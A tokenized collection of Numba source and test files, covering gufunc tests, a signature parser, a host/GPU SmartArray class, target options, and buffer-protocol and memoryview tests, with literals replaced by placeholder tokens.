. add ( "<STR_LIT>" ) <EOL> saxpy = ufbldr . build_ufunc ( ) <EOL> A = np . float32 ( <NUM_LIT:2> ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:10> ) : <EOL> exp = A * X [ j ] + Y [ j ] <EOL> self . assertTrue ( exp == out [ j ] , ( exp , out [ j ] ) ) <EOL> A = np . arange ( <NUM_LIT:5> , dtype = np . float32 ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A [ j ] * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] , ( exp , out [ j , i ] ) ) <EOL> class TestGUFuncDecor ( unittest . TestCase ) : <EOL> def test_gufunc_decorator ( self ) : <EOL> @ guvectorize ( [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' , target = '<STR_LIT>' ) <EOL> def saxpy ( a , x , y , out ) : <EOL> for i in range ( out . shape [ <NUM_LIT:0> ] ) : <EOL> out [ i ] = a * x [ i ] + y [ i ] <EOL> A = np . float32 ( <NUM_LIT:2> ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:10> ) : <EOL> exp = A * X [ j ] + Y [ j ] <EOL> self . assertTrue ( exp == out [ j ] , ( exp , out [ j ] ) ) <EOL> A = np . arange ( <NUM_LIT:5> , dtype = np . float32 ) <EOL> X = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> Y = np . arange ( <NUM_LIT:10> , dtype = np . float32 ) . reshape ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> out = saxpy ( A , X , Y ) <EOL> for j in range ( <NUM_LIT:5> ) : <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> exp = A [ j ] * X [ j , i ] + Y [ j , i ] <EOL> self . assertTrue ( exp == out [ j , i ] , ( exp , out [ j , i ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import absolute_import , print_function , division <EOL> import tokenize <EOL> import string <EOL> from numba import utils <EOL> def parse_signature ( sig ) : <EOL> '''<STR_LIT>''' <EOL> def stripws ( s ) : <EOL> return '<STR_LIT>' . join ( c for c in s if c not in string . whitespace ) <EOL> def tokenizer ( src ) : <EOL> def readline ( ) : <EOL> yield src <EOL> gen = readline ( ) <EOL> return tokenize . generate_tokens ( lambda : next ( gen ) ) <EOL> def parse ( src ) : <EOL> tokgen = tokenizer ( src ) <EOL> while True : <EOL> tok = next ( tokgen ) <EOL> if tok [ <NUM_LIT:1> ] == '<STR_LIT:(>' : <EOL> symbols = [ ] <EOL> while True : <EOL> tok = next ( tokgen ) <EOL> if tok [ <NUM_LIT:1> ] == '<STR_LIT:)>' : <EOL> break <EOL> elif tok [ <NUM_LIT:0> ] == tokenize . NAME : <EOL> symbols . append ( tok [ <NUM_LIT:1> ] ) <EOL> elif tok [ <NUM_LIT:1> ] == '<STR_LIT:U+002C>' : <EOL> continue <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % tok [ <NUM_LIT:1> ] ) <EOL> yield tuple ( symbols ) <EOL> tok = next ( tokgen ) <EOL> if tok [ <NUM_LIT:1> ] == '<STR_LIT:U+002C>' : <EOL> continue <EOL> elif tokenize . ISEOF ( tok [ <NUM_LIT:0> ] ) : <EOL> break <EOL> elif tokenize . ISEOF ( tok [ <NUM_LIT:0> ] ) : <EOL> break <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % tok [ <NUM_LIT:1> ] ) <EOL> ins , _ , outs = stripws ( sig ) . partition ( '<STR_LIT>' ) <EOL> inputs = list ( parse ( ins ) ) <EOL> outputs = list ( parse ( outs ) ) <EOL> isym = set ( ) <EOL> osym = set ( ) <EOL> for grp in inputs : <EOL> isym |= set ( grp ) <EOL> for grp in outputs : <EOL> osym |= set ( grp ) <EOL> diff = osym . difference ( isym ) <EOL> if diff : <EOL> raise NameError ( '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( sorted ( diff ) ) ) <EOL> return inputs , outputs </s>
<s> from numba . tracing import trace <EOL> import numpy <EOL> import sys <EOL> def _o2s ( dtype , shape , order ) : <EOL> if dtype is None or shape is None or order is None : <EOL> return None <EOL> if order == '<STR_LIT:F>' : <EOL> shape = list ( shape ) <EOL> shape . reverse ( ) <EOL> strides = [ ] <EOL> itemsize = dtype . itemsize <EOL> for i in range ( len ( shape ) , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> strides . append ( itemsize ) <EOL> itemsize *= shape [ i - <NUM_LIT:1> ] <EOL> if order in ( '<STR_LIT:C>' , None ) : <EOL> strides . reverse ( ) <EOL> return tuple ( strides ) <EOL> def _s2o ( dtype , shape , strides ) : <EOL> if strides is None or strides [ - <NUM_LIT:1> ] == dtype . itemsize : <EOL> order = '<STR_LIT:C>' <EOL> elif strides [ <NUM_LIT:0> ] == dtype . itemsize : <EOL> order = '<STR_LIT:F>' <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> s2 = _o2s ( dtype , shape , order ) <EOL> if strides != s2 : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return order <EOL> class SmartArray ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , obj = None , copy = True , <EOL> shape = None , dtype = None , order = None , where = '<STR_LIT:host>' ) : <EOL> """<STR_LIT>""" <EOL> assert where in ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> assert obj is not None or ( shape and dtype ) <EOL> self . _host = self . _gpu = None <EOL> self . _host_valid = self . _gpu_valid = False <EOL> self . _allocate ( where , obj , dtype , shape , _o2s ( dtype , shape , order ) , copy ) <EOL> if where == '<STR_LIT:host>' : <EOL> self . _host_valid = True <EOL> t = self . _host <EOL> else : <EOL> self . _gpu_valid = True <EOL> t = self . _gpu <EOL> self . _shape = t . shape <EOL> self . _strides = t . strides <EOL> self . _dtype = t . dtype <EOL> self . _ndim = t . ndim <EOL> self . _size = t . size <EOL> @ property <EOL> def shape ( self ) : return self . _shape <EOL> @ property <EOL> def strides ( self ) : return self . _strides <EOL> @ property <EOL> def dtype ( self ) : return self . _dtype <EOL> @ property <EOL> def ndim ( self ) : return self . _ndim <EOL> @ property <EOL> def size ( self ) : return self . _size <EOL> def host ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _sync ( '<STR_LIT:host>' ) <EOL> return self . _host <EOL> def host_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _invalidate ( '<STR_LIT>' ) <EOL> if self . _gpu is not None and sys . getrefcount ( self . _gpu ) > <NUM_LIT:2> : <EOL> self . _sync ( '<STR_LIT>' ) <EOL> def gpu ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _sync ( '<STR_LIT>' ) <EOL> return self . _gpu <EOL> def gpu_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _invalidate ( '<STR_LIT:host>' ) <EOL> if self . _host is not None and sys . getrefcount ( self . _host ) > <NUM_LIT:2> : <EOL> self . _sync ( '<STR_LIT:host>' ) <EOL> def __array__ ( self , * args ) : <EOL> self . _sync ( '<STR_LIT:host>' ) <EOL> return numpy . array ( self . _host , * args ) <EOL> def _sync ( self , where ) : <EOL> """<STR_LIT>""" <EOL> if where == '<STR_LIT>' : <EOL> if self . _gpu is None : <EOL> self . _allocate ( '<STR_LIT>' , None , self . dtype , self . shape , self . strides ) <EOL> if not self . _gpu_valid : <EOL> self . _copy_to_gpu ( ) <EOL> else : <EOL> if self . _host is None : <EOL> self . _allocate ( '<STR_LIT:host>' , None , self . dtype , self . shape , self . strides ) <EOL> if not self . _host_valid : <EOL> self . _copy_to_host ( ) <EOL> @ trace <EOL> def _invalidate ( self , where ) : <EOL> """<STR_LIT>""" <EOL> if where == '<STR_LIT>' : <EOL> self . _gpu_valid = False <EOL> else : <EOL> self . _host_valid = False <EOL> @ trace <EOL> def _allocate ( self , where , obj = None , dtype = None , shape = None , strides = None , <EOL> copy = True ) : <EOL> if dtype : <EOL> dtype = numpy . dtype ( dtype ) <EOL> if where == '<STR_LIT:host>' : <EOL> if obj is not None : <EOL> self . _host = numpy . array ( obj , dtype , copy = copy ) <EOL> else : <EOL> self . _host = numpy . empty ( shape , dtype , _s2o ( dtype , shape , strides ) ) <EOL> else : <EOL> from numba . cuda . cudadrv import devicearray as da <EOL> if obj is not None : <EOL> if not isinstance ( obj , numpy . ndarray ) : <EOL> obj = numpy . array ( obj , copy = False ) <EOL> self . _gpu = da . from_array_like ( obj ) <EOL> else : <EOL> if strides is None : <EOL> strides = _o2s ( dtype , shape , '<STR_LIT:C>' ) <EOL> self . _gpu = da . DeviceNDArray ( shape , strides , dtype ) <EOL> @ trace <EOL> def _copy_to_gpu ( self ) : <EOL> self . _gpu . copy_to_device ( self . _host ) <EOL> self . _gpu_valid = True <EOL> @ trace <EOL> def _copy_to_host ( self ) : <EOL> self . _gpu . copy_to_host ( self . _host ) <EOL> self . _host_valid = True <EOL> @ staticmethod <EOL> def _maybe_wrap ( value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , numpy . ndarray ) : <EOL> return SmartArray ( value , copy = False ) <EOL> else : <EOL> return value <EOL> @ trace <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if self . _host is None : <EOL> self . _allocate ( '<STR_LIT:host>' , None , self . dtype , self . shape , self . strides ) <EOL> return self . _maybe_wrap ( getattr ( self . _host , name ) ) <EOL> def __len__ ( self ) : return self . shape [ <NUM_LIT:0> ] <EOL> def __eq__ ( self , other ) : <EOL> if type ( self ) is not type ( other ) : return False <EOL> return self . _maybe_wrap ( self . host ( ) == other . host ( ) ) <EOL> def __getitem__ ( self , * args ) : <EOL> return self . _maybe_wrap ( self . host ( ) . __getitem__ ( * args ) ) <EOL> def __setitem__ ( self , * args ) : <EOL> return self . _maybe_wrap ( self . host ( ) . __setitem__ ( * args ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division , absolute_import <EOL> class TargetOptions ( object ) : <EOL> OPTIONS = { } <EOL> def __init__ ( self ) : <EOL> self . values = { } <EOL> def from_dict ( self , dic ) : <EOL> for k , v in dic . items ( ) : <EOL> try : <EOL> ctor = self . OPTIONS [ k ] <EOL> except KeyError : <EOL> fmt = "<STR_LIT>" <EOL> raise KeyError ( fmt % k ) <EOL> else : <EOL> self . values [ k ] = ctor ( v ) <EOL> @ classmethod <EOL> def parse_as_flags ( cls , flags , options ) : <EOL> opt = cls ( ) <EOL> opt . from_dict ( options ) <EOL> opt . set_flags ( flags ) <EOL> return flags <EOL> def set_flags ( self , flags ) : <EOL> """<STR_LIT>""" <EOL> kws = self . values . copy ( ) <EOL> if kws . pop ( '<STR_LIT>' , False ) == False : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( "<STR_LIT>" , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , True ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , True ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws . pop ( '<STR_LIT>' , False ) : <EOL> flags . set ( '<STR_LIT>' ) <EOL> flags . set ( "<STR_LIT>" ) <EOL> if kws : <EOL> raise NameError ( "<STR_LIT>" % kws . keys ( ) ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> from numba import unittest_support as unittest <EOL> import numpy as np <EOL> from numba import njit <EOL> from numba . npyufunc import dufunc <EOL> from . . support import MemoryLeakMixin <EOL> def pyuadd ( a0 , a1 ) : <EOL> return a0 + a1 <EOL> class TestDUFunc ( MemoryLeakMixin , unittest . TestCase ) : <EOL> def nopython_dufunc ( self , pyfunc ) : <EOL> return dufunc . DUFunc ( pyfunc , targetoptions = dict ( nopython = True ) ) <EOL> def test_frozen ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> self . assertFalse ( duadd . _frozen ) <EOL> duadd . _frozen = True <EOL> self . assertTrue ( duadd . _frozen ) <EOL> with self . assertRaises ( ValueError ) : <EOL> duadd . _frozen = False <EOL> with self . assertRaises ( TypeError ) : <EOL> duadd ( np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:10> ) , np . linspace ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> def test_scalar ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> self . assertEqual ( pyuadd ( <NUM_LIT:1> , <NUM_LIT:2> ) , duadd ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_npm_call ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> @ njit <EOL> def npmadd ( a0 , a1 , o0 ) : <EOL> duadd ( a0 , a1 , o0 ) <EOL> X = np . linspace ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:20> ) <EOL> X0 = X [ : <NUM_LIT:10> ] <EOL> X1 = X [ <NUM_LIT:10> : ] <EOL> out0 = np . zeros ( <NUM_LIT:10> ) <EOL> npmadd ( X0 , X1 , out0 ) <EOL> np . testing . assert_array_equal ( X0 + X1 , out0 ) <EOL> Y0 = X0 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> Y1 = X1 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> out1 = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> npmadd ( Y0 , Y1 , out1 ) <EOL> np . testing . assert_array_equal ( Y0 + Y1 , out1 ) <EOL> Y2 = X1 [ : <NUM_LIT:5> ] <EOL> out2 = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> npmadd ( Y0 , Y2 , out2 ) <EOL> np . testing . assert_array_equal ( Y0 + Y2 , out2 ) <EOL> def test_npm_call_implicit_output ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> @ njit <EOL> def npmadd ( a0 , a1 ) : <EOL> return duadd ( a0 , a1 ) <EOL> X = np . linspace ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:20> ) <EOL> X0 = X [ : <NUM_LIT:10> ] <EOL> X1 = X [ <NUM_LIT:10> : ] <EOL> out0 = npmadd ( X0 , X1 ) <EOL> np . testing . assert_array_equal ( X0 + X1 , out0 ) <EOL> Y0 = X0 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> Y1 = X1 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> out1 = npmadd ( Y0 , Y1 ) <EOL> np . testing . assert_array_equal ( Y0 + Y1 , out1 ) <EOL> Y2 = X1 [ : <NUM_LIT:5> ] <EOL> out2 = npmadd ( Y0 , Y2 ) <EOL> np . testing . assert_array_equal ( Y0 + Y2 , out2 ) <EOL> out3 = npmadd ( <NUM_LIT:1.> , <NUM_LIT> ) <EOL> self . assertEqual ( out3 , <NUM_LIT> ) <EOL> def test_ufunc_props ( self ) : <EOL> duadd = self . nopython_dufunc ( pyuadd ) <EOL> self . assertEqual ( duadd . nin , <NUM_LIT:2> ) <EOL> self . assertEqual ( duadd . nout , <NUM_LIT:1> ) <EOL> self . assertEqual ( duadd . nargs , duadd . nin + duadd . nout ) <EOL> self . assertEqual ( duadd . ntypes , <NUM_LIT:0> ) <EOL> self . assertEqual ( duadd . types , [ ] ) <EOL> self . assertEqual ( duadd . identity , None ) <EOL> duadd ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . assertEqual ( duadd . ntypes , <NUM_LIT:1> ) <EOL> self . assertEqual ( duadd . ntypes , len ( duadd . types ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , division , absolute_import <EOL> import array <EOL> import sys <EOL> import numpy as np <EOL> from numba import unittest_support as unittest <EOL> from numba import jit <EOL> from . support import TestCase , compile_function , MemoryLeakMixin <EOL> @ jit ( nopython = True ) <EOL> def len_usecase ( buf ) : <EOL> return len ( buf ) <EOL> @ jit ( nopython = True ) <EOL> def getitem_usecase ( buf , i ) : <EOL> return buf [ i ] <EOL> @ jit ( nopython = True ) <EOL> def getslice_usecase ( buf , i , j ) : <EOL> s = buf [ i : j ] <EOL> return s [ <NUM_LIT:0> ] + <NUM_LIT:2> * s [ - <NUM_LIT:1> ] <EOL> @ jit ( nopython = True ) <EOL> def setitem_usecase ( buf , i , v ) : <EOL> buf [ i ] = v <EOL> @ jit ( nopython = True ) <EOL> def iter_usecase ( buf ) : <EOL> res = <NUM_LIT:0.0> <EOL> for i , x in enumerate ( buf ) : <EOL> res += x <EOL> res *= i + <NUM_LIT:1> <EOL> return res <EOL> def attrgetter ( attr ) : <EOL> code = """<STR_LIT>""" % locals ( ) <EOL> pyfunc = compile_function ( "<STR_LIT>" , code , globals ( ) ) <EOL> return jit ( nopython = True ) ( pyfunc ) <EOL> contiguous_usecase = attrgetter ( "<STR_LIT>" ) <EOL> c_contiguous_usecase = attrgetter ( "<STR_LIT>" ) <EOL> f_contiguous_usecase = attrgetter ( "<STR_LIT>" ) <EOL> itemsize_usecase = attrgetter ( "<STR_LIT>" ) <EOL> nbytes_usecase = attrgetter ( "<STR_LIT>" ) <EOL> ndim_usecase = attrgetter ( "<STR_LIT>" ) <EOL> readonly_usecase = attrgetter ( "<STR_LIT>" ) <EOL> shape_usecase = attrgetter ( "<STR_LIT>" ) <EOL> strides_usecase = attrgetter ( "<STR_LIT>" ) <EOL> array_supported = sys . version_info >= ( <NUM_LIT:3> , ) <EOL> bytes_supported = sys . version_info >= ( <NUM_LIT:3> , ) <EOL> memoryview_structured_indexing = sys . version_info >= ( <NUM_LIT:3> , ) <EOL> class TestBufferProtocol ( MemoryLeakMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _arrays ( self ) : <EOL> n = <NUM_LIT:10> <EOL> for letter , offset in [ <EOL> ( '<STR_LIT:b>' , - <NUM_LIT:3> ) , <EOL> ( '<STR_LIT:B>' , <NUM_LIT:0> ) , <EOL> ( '<STR_LIT:h>' , - <NUM_LIT> ) , <EOL> ( '<STR_LIT:H>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:i>' , - <NUM_LIT> ) , <EOL> ( '<STR_LIT:I>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:l>' , - <NUM_LIT> ) , <EOL> ( '<STR_LIT:L>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:q>' , - <NUM_LIT:2> ** <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:2> ** <NUM_LIT> + <NUM_LIT:1> ) , <EOL> ( '<STR_LIT:f>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:d>' , - <NUM_LIT> ) , <EOL> ] : <EOL> yield array . array ( letter , [ i + offset for i in range ( n ) ] ) <EOL> def _memoryviews ( self ) : <EOL> n = <NUM_LIT:10> <EOL> yield memoryview ( bytearray ( b"<STR_LIT>" ) ) <EOL> yield memoryview ( b"<STR_LIT>" ) <EOL> for dtype , start , stop in [ <EOL> ( '<STR_LIT>' , - <NUM_LIT:10> , <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT:1000> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT:2> ** <NUM_LIT> , <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:64> - <NUM_LIT:10> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT:12> + <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT> , <NUM_LIT:12> + <NUM_LIT> ) , <EOL> ] : <EOL> yield memoryview ( np . linspace ( start , stop , n ) . astype ( dtype ) ) <EOL> arr = np . arange ( <NUM_LIT:12> ) . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> assert arr . flags . c_contiguous and not arr . flags . f_contiguous <EOL> yield memoryview ( arr ) <EOL> arr = arr . T <EOL> assert arr . flags . f_contiguous and not arr . flags . c_contiguous <EOL> yield memoryview ( arr ) <EOL> arr = arr [ : : <NUM_LIT:2> ] <EOL> assert not arr . flags . f_contiguous and not arr . flags . c_contiguous <EOL> yield memoryview ( arr ) <EOL> def _readonlies ( self ) : <EOL> if bytes_supported : <EOL> yield b"<STR_LIT>" <EOL> if memoryview_structured_indexing : <EOL> yield memoryview ( b"<STR_LIT>" ) <EOL> arr = np . arange ( <NUM_LIT:5> ) <EOL> arr . setflags ( write = False ) <EOL> yield memoryview ( arr ) <EOL> def _check_unary ( self , jitfunc , * args ) : <EOL> pyfunc = jitfunc . py_func <EOL> self . assertPreciseEqual ( jitfunc ( * args ) , pyfunc ( * args ) ) <EOL> def check_len ( self , obj ) : <EOL> self . _check_unary ( len_usecase , obj ) <EOL> def check_iter ( self , obj ) : <EOL> self . _check_unary ( iter_usecase , obj ) <EOL> def check_getitem ( self , obj ) : <EOL> def yield_indices ( obj ) : <EOL> try : <EOL> shape = obj . shape <EOL> except AttributeError : <EOL> shape = len ( obj ) , <EOL> for tup in np . ndindex ( shape ) : <EOL> if len ( tup ) == <NUM_LIT:1> : <EOL> yield tup [ <NUM_LIT:0> ] <EOL> else : <EOL> yield tup <EOL> for i in yield_indices ( obj ) : <EOL> try : <EOL> expected = obj [ i ] <EOL> except ( NotImplementedError , TypeError ) : <EOL> if isinstance ( obj , memoryview ) : <EOL> expected = obj . obj [ i ] <EOL> else : <EOL> raise <EOL> self . assertPreciseEqual ( getitem_usecase ( obj , i ) , expected ) <EOL> def check_setitem ( self , obj ) : <EOL> for i in range ( len ( obj ) ) : <EOL> orig = list ( obj ) <EOL> val = obj [ i ] // <NUM_LIT:2> + <NUM_LIT:1> <EOL> setitem_usecase ( obj , i , val ) <EOL> self . assertEqual ( obj [ i ] , val ) <EOL> for j , val in enumerate ( orig ) : <EOL> if j != i : <EOL> self . assertEqual ( obj [ j ] , val ) <EOL> def check_getslice ( self , obj ) : <EOL> self . _check_unary ( getslice_usecase , obj , <NUM_LIT:1> , len ( obj ) - <NUM_LIT:1> ) <EOL> def test_len ( self ) : <EOL> self . check_len ( bytearray ( <NUM_LIT:5> ) ) <EOL> if bytes_supported : <EOL> self . check_len ( b"<STR_LIT>" ) <EOL> for mem in self . _memoryviews ( ) : <EOL> self . check_len ( mem ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_len ( arr ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> def test_getitem ( self ) : <EOL> self . check_getitem ( bytearray ( b"<STR_LIT:abc>" ) ) <EOL> if bytes_supported : <EOL> self . check_getitem ( b"<STR_LIT>" ) <EOL> if memoryview_structured_indexing : <EOL> for mem in self . _memoryviews ( ) : <EOL> self . check_getitem ( mem ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_getitem ( arr ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> def test_getslice ( self ) : <EOL> with self . assertTypingError ( ) : <EOL> self . check_getslice ( bytearray ( b"<STR_LIT>" ) ) <EOL> if bytes_supported : <EOL> self . check_getslice ( b"<STR_LIT>" ) <EOL> if memoryview_structured_indexing : <EOL> self . check_getslice ( memoryview ( b"<STR_LIT>" ) ) <EOL> if array_supported : <EOL> with self . assertTypingError ( ) : <EOL> self . check_getslice ( array . array ( '<STR_LIT:i>' , range ( <NUM_LIT:10> ) ) ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> def test_setitem ( self ) : <EOL> self . check_setitem ( bytearray ( b"<STR_LIT>" ) ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_setitem ( arr ) <EOL> if memoryview_structured_indexing : <EOL> for mem in self . _memoryviews ( ) : <EOL> self . check_getitem ( mem ) <EOL> for buf in self . _readonlies ( ) : <EOL> with self . assertTypingError ( ) : <EOL> self . check_setitem ( buf ) <EOL> def test_iter ( self ) : <EOL> self . check_iter ( bytearray ( b"<STR_LIT:abc>" ) ) <EOL> if bytes_supported : <EOL> self . check_iter ( b"<STR_LIT>" ) <EOL> if memoryview_structured_indexing : <EOL> self . check_iter ( memoryview ( b"<STR_LIT>" ) ) <EOL> if array_supported : <EOL> for arr in self . _arrays ( ) : <EOL> self . check_iter ( arr ) <EOL> for buf in self . _readonlies ( ) : <EOL> self . check_getitem ( buf ) <EOL> class TestMemoryView ( MemoryLeakMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _arrays ( self ) : <EOL> arr = np . arange ( <NUM_LIT:12> ) <EOL> yield arr <EOL> arr = arr . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> yield arr <EOL> yield arr . T <EOL> yield arr [ : : <NUM_LIT:2> ] <EOL> arr . setflags ( write = False ) <EOL> yield arr <EOL> arr = np . zeros ( ( ) ) <EOL> assert arr . ndim == <NUM_LIT:0> <EOL> yield arr <EOL> def test_ndim ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( ndim_usecase ( m ) , arr . ndim ) <EOL> def test_shape ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( shape_usecase ( m ) , arr . shape ) <EOL> def test_strides ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( strides_usecase ( m ) , arr . strides ) <EOL> def test_itemsize ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( itemsize_usecase ( m ) , arr . itemsize ) <EOL> def test_nbytes ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertPreciseEqual ( nbytes_usecase ( m ) , arr . size * arr . itemsize ) <EOL> def test_readonly ( self ) : <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertIs ( readonly_usecase ( m ) , not arr . flags . writeable ) <EOL> m = memoryview ( b"<STR_LIT>" ) <EOL> self . assertIs ( readonly_usecase ( m ) , True ) <EOL> m = memoryview ( bytearray ( b"<STR_LIT>" ) ) <EOL> self . assertIs ( readonly_usecase ( m ) , False ) <EOL> @ unittest . skipUnless ( sys . version_info >= ( <NUM_LIT:3> , ) , <EOL> "<STR_LIT>" ) <EOL> def test_contiguous ( self ) : <EOL> m = memoryview ( bytearray ( b"<STR_LIT>" ) ) <EOL> self . assertIs ( contiguous_usecase ( m ) , True ) <EOL> self . assertIs ( c_contiguous_usecase ( m ) , True ) <EOL> self . assertIs ( f_contiguous_usecase ( m ) , True ) <EOL> for arr in self . _arrays ( ) : <EOL> m = memoryview ( arr ) <EOL> self . assertIs ( contiguous_usecase ( m ) , <EOL> arr . flags . f_contiguous or arr . flags . c_contiguous ) <EOL> self . assertIs ( c_contiguous_usecase ( m ) , arr . flags . c_contiguous ) <EOL> self . assertIs ( f_contiguous_usecase ( m ) , arr . flags . f_contiguous ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
